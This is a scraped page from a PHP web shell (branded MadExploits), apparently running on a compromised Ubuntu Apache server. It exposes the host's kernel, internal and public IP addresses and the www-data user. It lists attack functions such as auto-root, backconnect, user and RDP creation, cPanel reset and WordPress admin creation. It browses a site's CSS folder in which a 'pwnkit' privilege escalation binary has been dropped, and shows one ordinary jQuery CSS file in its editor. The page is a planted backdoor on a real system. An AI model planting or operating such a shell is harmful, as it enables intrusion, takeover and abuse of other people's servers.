Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.220.25.158
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amply /
public /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
elegant
[ DIR ]
drwxrwxr-x
fonts
[ DIR ]
drwxrwxr-x
icomoon
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
interface
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
bootstrap.min.css
141.44
KB
-rw-rw-r--
bootstrap3.css
118.32
KB
-rw-rw-r--
dataTables.css
4.88
KB
-rw-rw-r--
datatables-custom.css
1.52
KB
-rw-rw-r--
datepicker.css
12.84
KB
-rw-rw-r--
elegant_style.css
24.65
KB
-rwxrwxr-x
featherlight.css
1.82
KB
-rw-rw-r--
font-awesome.css
21.14
KB
-rw-rw-r--
front.css
36.69
KB
-rw-rw-r--
home.css
4.36
KB
-rw-rw-r--
icomoon.zip
45.35
KB
-rw-rw-r--
iconfont.css
11.52
KB
-rw-rw-r--
interface.css
1.27
KB
-rw-rw-r--
jquery-ui.css
36.47
KB
-rw-rw-r--
jquery.fs.stepper.css
1.61
KB
-rw-rw-r--
jquery.modal.min.css
3.13
KB
-rw-rw-r--
main2.css
105.53
KB
-rw-rw-r--
numpad.css
255
B
-rw-rw-r--
owl-carousel.min.css
3.27
KB
-rw-rw-r--
owl-carousel.theme.min.css
1.34
KB
-rw-rw-r--
print.min.css
254
B
-rw-rw-r--
prism.css
2.63
KB
-rwxrwxr-x
pwnkit
10.99
KB
-rwxr-xr-x
select2.css
14.92
KB
-rw-rw-r--
select2.min.css
14.92
KB
-rw-rw-r--
style.css
13.5
KB
-rw-rw-r--
style32.css
11.25
KB
-rw-rw-r--
styles.css
23.77
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.fs.stepper.css
/* * Stepper v3.0.8 - 2015-04-04 * A jQuery plugin for cross browser number inputs. Part of the Formstone Library. * http://classic.formstone.it/stepper/ * * Copyright 2015 Ben Plum; MIT Licensed */ .stepper { border-radius: 3px; margin: 0 0 10px 0; overflow: hidden; position: relative; width: 300px; } .stepper .stepper-input { background: #F9F9F9; border: 1px solid #ccc; border-radius: 3px; color: #333; font-size: 13px; line-height: 1.2; margin: 0; overflow: hidden; padding: 9px 10px 10px; width: 100%; z-index: 49; -moz-appearance: textfield; } .stepper .stepper-input::-webkit-inner-spin-button, .stepper .stepper-input::-webkit-outer-spin-button { -webkit-appearance: none; margin: 0; } .stepper .stepper-input:focus { background-color: #fff; } .stepper .stepper-arrow { background: #eee url(../images/stepper/jquery.fs.stepper-arrows.png) no-repeat; border: 1px solid #ccc; cursor: pointer; display: block; height: 50%; position: absolute; right: 0; text-indent: -99999px; width: 20px; z-index: 50; } .stepper .stepper-arrow.up { background-position: center top; border-bottom: none; top: 0; } .stepper .stepper-arrow.down { background-position: center bottom; bottom: 0; } @media screen and (min-width: 740px) { .stepper:hover .stepper-input { background-color: #fff; } .stepper .stepper-step:hover { background-color: #F9F9F9; } .stepper.disabled .stepper-arrow { background: #fff; border-color: #eee; cursor: default; } } .stepper.disabled .stepper-input { background: #fff; border-color: #eee; color: #ccc; } .stepper.disabled .stepper-arrow { background: #fff; border-color: #eee; cursor: default; }
Close